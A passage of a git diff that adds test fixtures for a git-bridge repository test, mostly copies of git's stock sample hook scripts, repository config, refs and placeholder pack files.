+# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. 
+ else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". 
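
As a concrete illustration, check (1) from the notes above can also be run by hand, outside the hook. The following is only a minimal sketch, not part of the sample hook itself: it assumes a repository whose branches are literally named "master", "next" and "topic", the names the sample hardcodes.

    #!/bin/sh
    # Sketch of check (1): has "topic" ever been merged to "next"?
    # The branch names are assumptions taken from the sample above.
    only_next_1=$(git rev-list ^master ^topic next | sort)
    only_next_2=$(git rev-list ^master next | sort)
    if test "$only_next_1" = "$only_next_2"
    then
        echo "topic has never been merged to next; rebasing it is safe"
    else
        echo "topic has commits already published on next; do not rebase"
    fi

Sorting both lists before comparing mirrors what the sample hook does, so the comparison does not depend on rev-list output order.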
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." 
>&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) 
+ echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/index new file mode 100644 index 0000000..ac6d4fd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/refs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/refs new file mode 100644 index 0000000..9c9037a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/info/refs @@ -0,0 +1 @@ +71ebe5d70c8634f7531cc09c1cad5dae951a9052 refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/logs/HEAD new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4632440628786417060.pack b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4632440628786417060.pack new file mode 100644 index 0000000..c1a7bd5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4632440628786417060.pack @@ -0,0 +1 @@ +blah blah blah diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4635689790689803605.pack b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4635689790689803605.pack new file mode 100644 index 0000000..6e5fe03 --- /dev/null +++ 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/incoming_4635689790689803605.pack @@ -0,0 +1 @@ +i am a pack diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/info/packs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/info/packs new file mode 100644 index 0000000..bbfa012 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/info/packs @@ -0,0 +1,2 @@ +P pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx new file mode 100644 index 0000000..30d5e13 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack new file mode 100644 index 0000000..d28e3bd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/packed-refs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/packed-refs new file mode 100644 index 0000000..102f77f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/packed-refs @@ -0,0 +1,2 @@ +# pack-refs with: peeled fully-peeled +71ebe5d70c8634f7531cc09c1cad5dae951a9052 refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/file1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/file1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/file2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/file2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/.gitignore new file mode 100644 index 0000000..5545880 --- /dev/null +++ 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/.gitignore @@ -0,0 +1,2 @@ +*.ignored + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..217e7d6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. 
git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. 
git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. 
+# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if 